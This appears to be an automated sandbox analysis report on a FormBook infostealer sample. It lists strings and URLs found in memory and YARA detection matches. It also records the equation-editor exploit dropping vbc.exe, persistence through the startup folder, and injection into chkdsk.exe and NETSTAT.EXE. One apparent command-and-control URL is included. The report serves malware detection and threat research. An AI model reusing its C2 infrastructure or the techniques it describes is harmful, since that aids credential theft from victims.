Source: chkdsk.exe, 00000009.00000002.2382275945.000000000064C000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/de-de/ocid=iehp
Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2203185538.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2217628937.000000000861C000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: chkdsk.exe, 00000009.00000002.2383534485.0000000002BA9000.00000004.00000001.sdmp String found in binary or memory: http://www.realestateworld.club
Source: chkdsk.exe, 00000009.00000002.2383534485.0000000002BA9000.00000004.00000001.sdmp String found in binary or memory: http://www.realestateworld.club/zsh/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: chkdsk.exe, 00000009.00000002.2382290968.0000000000666000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2C
Source: chkdsk.exe, 00000009.00000002.2382290968.0000000000666000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: chkdsk.exe, 00000009.00000003.2255516069.0000000003C40000.00000004.00000001.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: chkdsk.exe, 00000009.00000002.2383604517.0000000002F1F000.00000004.00000001.sdmp String found in binary or memory: https://www.realestateworld.club/zsh/?bF=sOdpdc8WylSE20oUMI6XEqumhVh4hEgg3qNX/lZ/ecXaPMOIO0KiFboY7hZ

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\chkdsk.exe Dropped file: C:\Users\user\AppData\Roaming\98-QN40B\98-logri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\chkdsk.exe Dropped file: C:\Users\user\AppData\Roaming\98-QN40B\98-logrv.ini Jump to dropped file
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Dropped file: C:\Users\user\AppData\Roaming\98-QN40B\98-logrf.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: protected documents the yellow bar above 25 26 27 28 29 30 31 32 33 34 35 0 0 36 37
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_0019D018 NtQueryInformationProcess, 4_2_0019D018
Source: C:\Users\Public\vbc.exe Code function: 4_2_0019D0D9 NtQueryInformationProcess, 4_2_0019D0D9
Source: C:\Users\Public\vbc.exe Code function: 4_2_0019D010 NtQueryInformationProcess, 4_2_0019D010
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041A050 NtClose, 5_2_0041A050
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041A100 NtAllocateVirtualMemory, 5_2_0041A100
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419F20 NtCreateFile, 5_2_00419F20
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419FD0 NtReadFile, 5_2_00419FD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041A04E NtClose, 5_2_0041A04E
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041A0FA NtAllocateVirtualMemory, 5_2_0041A0FA
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419F72 NtCreateFile, 5_2_00419F72
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419FCB NtReadFile, 5_2_00419FCB
Source: C:\Users\Public\vbc.exe Code function: 5_2_008400C4 NtCreateFile,LdrInitializeThunk, 5_2_008400C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00840048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00840048
Source: C:\Users\Public\vbc.exe Code function: 5_2_00840078 NtResumeThread,LdrInitializeThunk, 5_2_00840078
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083F9F0 NtClose,LdrInitializeThunk, 5_2_0083F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083F900 NtReadFile,LdrInitializeThunk, 5_2_0083F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0083FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0083FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0083FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0083FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0083FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0083FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0083FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0083FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0083FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0083FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0083FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00840060 NtQuerySection, 5_2_00840060
Source: C:\Users\Public\vbc.exe Code function: 5_2_008401D4 NtSetValueKey, 5_2_008401D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0084010C NtOpenDirectoryObject, 5_2_0084010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_008407AC NtCreateMutant, 5_2_008407AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00840C40 NtGetContextThread, 5_2_00840C40
Source: C:\Users\Public\vbc.exe Code function: 5_2_008410D0 NtOpenProcessToken, 5_2_008410D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00841148 NtOpenThread, 5_2_00841148
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083F8CC NtWaitForSingleObject, 5_2_0083F8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00841930 NtSetContextThread, 5_2_00841930
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083F938 NtWriteFile, 5_2_0083F938
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FAB8 NtQueryValueKey, 5_2_0083FAB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FA20 NtQueryInformationFile, 5_2_0083FA20
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FA50 NtEnumerateValueKey, 5_2_0083FA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FBE8 NtQueryVirtualMemory, 5_2_0083FBE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FB50 NtCreateKey, 5_2_0083FB50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FC30 NtOpenProcess, 5_2_0083FC30
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FC48 NtSetInformationFile, 5_2_0083FC48
Source: C:\Users\Public\vbc.exe Code function: 5_2_00841D80 NtSuspendThread, 5_2_00841D80
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FD5C NtEnumerateKey, 5_2_0083FD5C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FE24 NtWriteVirtualMemory, 5_2_0083FE24
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FFFC NtCreateProcessEx, 5_2_0083FFFC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FF34 NtQueueApcThread, 5_2_0083FF34
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039D018 NtQueryInformationProcess, 7_2_0039D018
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039D0D9 NtQueryInformationProcess, 7_2_0039D0D9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039D010 NtQueryInformationProcess, 7_2_0039D010
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041A050 NtClose, 8_2_0041A050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041A100 NtAllocateVirtualMemory, 8_2_0041A100
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00419F20 NtCreateFile, 8_2_00419F20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00419FD0 NtReadFile, 8_2_00419FD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041A04E NtClose, 8_2_0041A04E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041A0FA NtAllocateVirtualMemory, 8_2_0041A0FA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00419F72 NtCreateFile, 8_2_00419F72
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00419FCB NtReadFile, 8_2_00419FCB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C00C4 NtCreateFile,LdrInitializeThunk, 8_2_008C00C4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C0048 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_008C0048
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C0078 NtResumeThread,LdrInitializeThunk, 8_2_008C0078
